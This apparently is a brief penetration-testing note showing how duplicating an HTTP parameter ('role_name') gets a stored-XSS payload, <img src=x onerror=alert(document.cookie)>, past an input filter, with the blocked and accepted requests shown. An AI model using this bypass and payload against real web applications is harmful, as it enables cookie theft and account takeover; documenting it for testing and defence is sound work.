Parameter Pollution

XSS Bypass Via Parameter Pollution

Bypass with &asad

Test Case: 1

role_name=<img+src=x+onerror=alert(document.cookie)>
400 Bad Request 
......
Only words and numbers are allowed. 
--------------------------------------
role_name=<img+src=x+onerror=alert(document.cookie)>&role_name=test
......
200 ok
Bypass: The application successfully accepted both parameters

Bypass : I intercepted the request and added an additional “role_name” parameter before the original one. I injected the payload into that additional parameter while keeping the value of the original parameter as test, so the POST parameters looked like this:

role_name=<img+src=x+onerror=alert(document.cookie)>&role_name=test